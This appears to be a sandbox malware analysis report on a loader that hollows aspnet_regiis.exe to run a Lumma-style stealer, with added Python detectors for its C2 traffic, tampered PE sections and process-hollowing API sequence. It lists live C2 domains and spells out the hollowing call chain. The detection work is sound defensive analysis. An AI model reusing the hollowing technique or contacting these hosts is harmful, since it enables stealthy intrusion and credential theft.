                           Source: aspnet_regiis.exe, 00000003.00000003.2040127622.0000000004F5A000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040597834.0000000004F57000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000003.00000003.2040416367.0000000004F57000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                           Source: aspnet_regiis.exe, 00000003.00000003.2070475560.000000000504A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                           Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
                           Source: unknown | Network traffic detected: HTTP traffic on port 49716 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
                           Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49716
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
                           Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
                           Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49704 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49705 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49707 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49709 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49714 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49715 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49716 version: TLS 1.2
                           Source: unknown | HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.5:49717 version: TLS 1.2
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02792590: OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_04D01000: EntryPoint, GetClipboardSequenceNumber, Sleep, Sleep, OpenClipboard, GetClipboardData, GlobalLock, GlobalAlloc, GlobalLock, GlobalUnlock, EmptyClipboard, SetClipboardData, GlobalFree, GlobalUnlock, CloseClipboard, GetClipboardSequenceNumber
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02792590: OpenClipboard, GetClipboardData, GlobalLock, GetWindowLongW, GlobalUnlock, CloseClipboard
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02792700: GetDC, GetSystemMetrics, GetSystemMetrics, GetSystemMetrics, GetCurrentObject, GetObjectW, DeleteObject, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt
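The C2 session above has a recognisable shape: every request is a POST to /api on one of the nine domains the configuration extractor recovered, the User-Agent claims Chrome/119 although the sender is aspnet_regiis.exe, the first two bodies are short form-urlencoded check-ins (8 and 53 bytes), the next five are multipart/form-data uploads with random boundaries that grow to 586242 bytes as harvested data is pushed out, and a final 88-byte form-urlencoded request closes the exchange. The Python below is an added example, not part of the Joe Sandbox report: it parses request heads of that form and classifies them against the extracted domain list. The capture it runs on is reconstructed from the eight request heads listed above (same headers, same Content-Length values and boundaries), plus one constructed benign GET to the placeholder host example.com; the function names (`parse_request_head`, `classify`, `summarize`) are illustrative, and because the report shows no bodies the classification relies on headers only.

```python
"""Flag Lumma-style C2 sessions in captured HTTP request heads: POST /api to one of
the extracted C2 domains, a spoofed Chrome/119 User-Agent, short form-urlencoded
check-ins, then multipart uploads that carry the harvested data."""
import re
from dataclasses import dataclass, field
from typing import Dict, Optional

# Domains reported by the malware configuration extractor for this sample.
C2_DOMAINS = {
    "noisycuttej.shop", "framekgirus.shop", "nearycrepso.shop",
    "wholersorie.shop", "fancywaxxers.shop", "abruptyopsn.shop",
    "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop",
}
# User-Agent sent on every C2 request in the report; the sender is aspnet_regiis.exe, not Chrome.
C2_USER_AGENT = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                 "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


@dataclass
class Request:
    method: str
    path: str
    headers: Dict[str, str] = field(default_factory=dict)


def parse_request_head(raw: str) -> Request:
    """Parse a request line plus header lines (CRLF or LF separated)."""
    lines = [ln for ln in re.split(r"\r?\n", raw.strip()) if ln.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return Request(method, path, headers)


def classify(req: Request) -> Optional[str]:
    """Return 'checkin', 'exfil' or 'c2-other' for a request to a known C2 host, else None."""
    host = req.headers.get("host", "").lower()
    if req.method != "POST" or req.path != "/api" or host not in C2_DOMAINS:
        return None
    ctype = req.headers.get("content-type", "").lower()
    if ctype.startswith("application/x-www-form-urlencoded"):
        return "checkin"          # short bodies: beacon / task polling
    if ctype.startswith("multipart/form-data"):
        return "exfil"            # large bodies: stolen-data upload
    return "c2-other"


def summarize(capture: str) -> Dict[str, int]:
    """Classify each request head in a blank-line separated capture; total the bytes
    pushed to the C2 in multipart uploads and count C2 requests carrying the spoofed UA."""
    counts = {"checkin": 0, "exfil": 0, "c2-other": 0, "benign": 0,
              "exfil_bytes": 0, "spoofed_ua": 0}
    for block in re.split(r"\n\s*\n", capture.strip()):
        req = parse_request_head(block)
        verdict = classify(req) or "benign"
        counts[verdict] += 1
        if verdict == "exfil":
            counts["exfil_bytes"] += int(req.headers.get("content-length", "0"))
        if verdict != "benign" and req.headers.get("user-agent") == C2_USER_AGENT:
            counts["spoofed_ua"] += 1
    return counts


def _c2_post(ctype: str, length: int) -> str:
    """Rebuild one request head as listed in the report (bodies were not captured)."""
    return (f"POST /api HTTP/1.1\nConnection: Keep-Alive\nContent-Type: {ctype}\n"
            f"User-Agent: {C2_USER_AGENT}\nContent-Length: {length}\nHost: fancywaxxers.shop\n")


# Constructed capture: the eight request heads from the report, in order, plus one
# benign request to a placeholder host so the non-C2 path is exercised.
SAMPLE_CAPTURE = "\n".join([
    _c2_post("application/x-www-form-urlencoded", 8),
    _c2_post("application/x-www-form-urlencoded", 53),
    _c2_post("multipart/form-data; boundary=AMTB3QLKBFJ98IV", 12823),
    _c2_post("multipart/form-data; boundary=7E5OXTHN8747P", 15053),
    _c2_post("multipart/form-data; boundary=CVKA9J29E8AUJ7", 20549),
    _c2_post("multipart/form-data; boundary=4H4JHYC6MWK5EZIZ", 1280),
    _c2_post("multipart/form-data; boundary=L5A4SY5A1OSHVBRM0", 586242),
    _c2_post("application/x-www-form-urlencoded", 88),
    "GET /index.html HTTP/1.1\nHost: example.com\nUser-Agent: curl/8.0\n",
])

if __name__ == "__main__":
    print(summarize(SAMPLE_CAPTURE))
```

The Host match against the extracted domain list is the primary signal; the Chrome/119 User-Agent is only counted, never used alone, because real browsers send the same string. All of this traffic ran over TLS 1.2 to 104.21.32.1:443 (a Cloudflare address shared by many tenants), so request heads are only visible with TLS inspection; without it, the DNS query for fancywaxxers.shop, the TLS SNI, and the JA3 fingerprint a0e9f5d64349fb13191bc781f81f42e1 that Suricata alerted on are the observable equivalents.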

                          System Summary

                           Source: R3nz_Loader.exe | Static PE information: section name: ^]tBD;I
                           Source: R3nz_Loader.exe | Static PE information: section name: "" (nameless)
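The two rows above describe the loader's section table: one section whose name is the non-compiler string `^]tBD;I` and one with an all-zero Name field, both typical of a packer or protector that rewrites the headers. The parser below is an added example, not code from the report: it walks the COFF and section headers and flags nameless names, names with non-printable bytes, and names containing characters outside the set compilers and linkers actually emit. The PE it runs on is a minimal constructed fixture built by `build_sample_pe` (valid headers, no code), not R3nz_Loader.exe; `audit_sections` and `name_problem` are illustrative names.

```python
"""Audit PE section headers for the anomalies the report flags: nameless sections
and section names made of characters no compiler or linker would emit."""
import struct
from typing import List, Tuple

# Characters seen in legitimate section names (.text, .rdata, UPX0, .gfids, $-suffixed names).
ALLOWED = set(b"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789._$")
# Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
# SizeOfOptionalHeader, Characteristics
COFF_HEADER = "<HHIIIHH"
# Name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData, PointerToRelocations,
# PointerToLinenumbers, NumberOfRelocations, NumberOfLinenumbers, Characteristics
SECTION_HEADER = "<8sIIIIIIHHI"


def section_names(pe: bytes) -> List[bytes]:
    """Return the raw 8-byte Name field of every section header."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from(COFF_HEADER, pe, coff)
    first = coff + struct.calcsize(COFF_HEADER) + opt_size
    return [struct.unpack_from(SECTION_HEADER, pe, first + i * 40)[0] for i in range(nsec)]


def name_problem(name: bytes) -> str:
    """Return a reason string if the section name is anomalous, else ''."""
    stripped = name.rstrip(b"\0")
    if not stripped:
        return "nameless section"
    if any(b < 0x20 or b > 0x7E for b in stripped):
        return "non-printable bytes in name"
    if any(b not in ALLOWED for b in stripped):
        return "special characters in name"
    return ""


def audit_sections(pe: bytes) -> List[Tuple[int, bytes, str]]:
    """List (index, name, reason) for every section whose name looks tampered with."""
    findings = []
    for i, name in enumerate(section_names(pe)):
        reason = name_problem(name)
        if reason:
            findings.append((i, name.rstrip(b"\0"), reason))
    return findings


def build_sample_pe(names: List[bytes]) -> bytes:
    """Construct a minimal, non-executable PE32 image carrying the given section names
    (test fixture only; this is not the analysed sample)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                                        # PE32 optional header size
    coff = struct.pack(COFF_HEADER, 0x14C, len(names), 0, 0, 0, opt_size, 0x0102)
    optional = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    sections = b"".join(
        struct.pack(SECTION_HEADER, n[:8], 0x1000, 0x1000 * (i + 1),
                    0, 0, 0, 0, 0, 0, 0x60000020)
        for i, n in enumerate(names))
    return dos_header + b"PE\0\0" + coff + optional + sections


if __name__ == "__main__":
    sample = build_sample_pe([b".text", b".rdata", b"", b"^]tBD;I", b".rsrc"])
    for idx, name, reason in audit_sections(sample):
        print(f"section {idx}: {name!r}: {reason}")
```

A renamed or empty section name is a packer indicator rather than proof of malice on its own; here it sits next to "Detected unpacking (changes PE section rights)" in the signature list, which is the behaviour that confirms the headers were rewritten to hide a payload.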
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE8640: WindowsHandle, GetConsoleWindow, ShowWindow, VirtualAlloc, CreateProcessW, NtGetContextThread, NtAllocateVirtualMemory, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, NtSetContextThread, NtResumeThread, CloseHandle, CloseHandle, NtAllocateVirtualMemory, NtWriteVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, NtSetContextThread, NtResumeThread, CreateProcessW, CloseHandle, CloseHandle, NtReadVirtualMemory
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE6B80: GetModuleHandleW, NtQueryInformationProcess
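The call list for 0_2_6CEE8640 above is the process-hollowing sequence that explains why the stealer runs inside aspnet_regiis.exe: CreateProcessW spawns the host, NtGetContextThread reads its initial thread context, NtAllocateVirtualMemory and a run of NtWriteVirtualMemory place the payload, NtSetContextThread redirects the thread, and NtResumeThread starts it. The Python below is an added example, not the sandbox's own logic: it scores a flat API-call trace for exactly that ordered chain and reports, per CreateProcessW, how many writes land before the resume and whether the context was hijacked or a remote thread created (NtCreateThreadEx also appears in the list). The trace it runs on is the report's call list transcribed verbatim; `find_ordered` and `detect_hollowing` are illustrative names, and the assumption that everything up to the next CreateProcessW belongs to the same child is a simplification stated in the code.

```python
"""Score a flat API-call trace for process hollowing: a child created with
CreateProcessW, memory allocated and written in it, the thread context replaced,
then the thread resumed. SAMPLE_TRACE is the call list the report gives for
function 0_2_6CEE8640 in R3nz_Loader.exe."""
from typing import Dict, List, Optional, Sequence

# The ordered chain that distinguishes hollowing from a plain CreateProcessW.
HOLLOW_CHAIN = ("NtAllocateVirtualMemory", "NtWriteVirtualMemory",
                "NtSetContextThread", "NtResumeThread")

SAMPLE_TRACE = [
    "WindowsHandle", "GetConsoleWindow", "ShowWindow", "VirtualAlloc", "CreateProcessW",
    "NtGetContextThread", "NtAllocateVirtualMemory", "NtAllocateVirtualMemory",
    "NtWriteVirtualMemory", "NtWriteVirtualMemory", "NtWriteVirtualMemory",
    "NtReadVirtualMemory", "NtWriteVirtualMemory", "NtWriteVirtualMemory",
    "NtCreateThreadEx", "NtSetContextThread", "NtResumeThread", "CloseHandle", "CloseHandle",
    "NtAllocateVirtualMemory", "NtWriteVirtualMemory", "NtReadVirtualMemory",
    "NtWriteVirtualMemory", "NtSetContextThread", "NtResumeThread", "CreateProcessW",
    "CloseHandle", "CloseHandle", "NtReadVirtualMemory",
]


def find_ordered(trace: Sequence[str], pattern: Sequence[str],
                 start: int = 0, stop: Optional[int] = None) -> Optional[List[int]]:
    """Greedy in-order subsequence match of pattern within trace[start:stop].
    Returns the index of each matched call, or None if the chain is incomplete."""
    stop = len(trace) if stop is None else stop
    hits: List[int] = []
    i = start
    for name in pattern:
        while i < stop and trace[i] != name:
            i += 1
        if i >= stop:
            return None
        hits.append(i)
        i += 1
    return hits


def detect_hollowing(trace: Sequence[str]) -> List[Dict]:
    """One finding per CreateProcessW: whether the hollowing chain follows it, how many
    writes land before the thread is resumed, whether the context was read first
    (NtGetContextThread: entry-point hijack) and whether a thread was created remotely
    (NtCreateThreadEx). Simplification: every call up to the next CreateProcessW is
    attributed to the child created by this one."""
    creates = [i for i, call in enumerate(trace) if call == "CreateProcessW"]
    findings: List[Dict] = []
    for k, c in enumerate(creates):
        stop = creates[k + 1] if k + 1 < len(creates) else len(trace)
        chain = find_ordered(trace, HOLLOW_CHAIN, c + 1, stop)
        finding: Dict = {"create_index": c, "hollowing": chain is not None}
        if chain is not None:
            window = list(trace[c + 1:chain[-1]])
            finding["chain"] = chain
            finding["writes_before_resume"] = window.count("NtWriteVirtualMemory")
            finding["entry_hijack"] = "NtGetContextThread" in window
            finding["remote_thread"] = "NtCreateThreadEx" in window
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in detect_hollowing(SAMPLE_TRACE):
        print(finding)
```

On the report's trace the first CreateProcessW is followed by the full chain with five writes before the resume, a context read and a remote thread; the second NtSetContextThread/NtResumeThread pair that follows the first resume is a further injection into the same child that this per-CreateProcessW view does not count separately. The second CreateProcessW has no chain after it. In an EDR the same logic runs over ETW or kernel-callback events keyed by target process handle rather than over a flat list, which removes the attribution simplification.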
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A4F4A0
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A37CF0
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A4ECD0
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A69620
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A5EC40
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A38180
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A4E9F0
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A40520
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A35330
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A37330
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A34910
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A38F60
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A43760
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A50770
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_00A68D50
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE8640
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE6B80
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE1740
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE1000
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE7D90
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEFA2F1
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEF0250
                           Source: C:\Users\user\Desktop\R3nz_Loader.exe | Code function: 0_2_6CEE43E0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02785A60
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0276D3E9
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02797BA0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02775050
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02797810
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278208A
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279B150
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02782E78
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279F670
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278BE6E
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0277062F
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027787FE
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02768790
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0276AC50
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02771CE0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279ED50
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02780D80
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02766270
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279E270
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02764260
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02774A6F
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0277D250
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278B244
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02774A31
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02780A35
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0277DA20
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0277C22F
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02785210
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02788A00
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02787200
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027972D0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0276EAA0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279DA91
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02784B64
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0277FB50
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279F340
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02768320
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279031D
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0278BBFA
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_027743D0
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02769390
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02764B90
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279E380
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_02797070
                           Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe | Code function: 3_2_0279B860
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279F0503_2_0279F050
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027918473_2_02791847
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277A8203_2_0277A820
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027778283_2_02777828
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B0DD3_2_0278B0DD
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B0C03_2_0276B0C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027690B03_2_027690B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027638B03_2_027638B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027658B03_2_027658B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027838903_2_02783890
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027800903_2_02780090
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027960813_2_02796081
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027819503_2_02781950
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027761463_2_02776146
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277712B3_2_0277712B
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0276B9093_2_0276B909
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278B1EA3_2_0278B1EA
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278D1C03_2_0278D1C0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E9A03_2_0279E9A0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027711963_2_02771196
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278EE793_2_0278EE79
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02787E5C3_2_02787E5C
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0279E6403_2_0279E640
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02785E003_2_02785E00
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02765ED03_2_02765ED0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277C6B03_2_0277C6B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027836B03_2_027836B0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02784EB03_2_02784EB0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02762E903_2_02762E90
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277BE803_2_0277BE80
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0277CF703_2_0277CF70
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027987703_2_02798770
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027887483_2_02788748
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027797203_2_02779720
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02798F193_2_02798F19
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027667003_2_02766700
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02776FF03_2_02776FF0
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_027877F33_2_027877F3
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_02778FE73_2_02778FE7
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 3_2_0278DFE93_2_0278DFE9
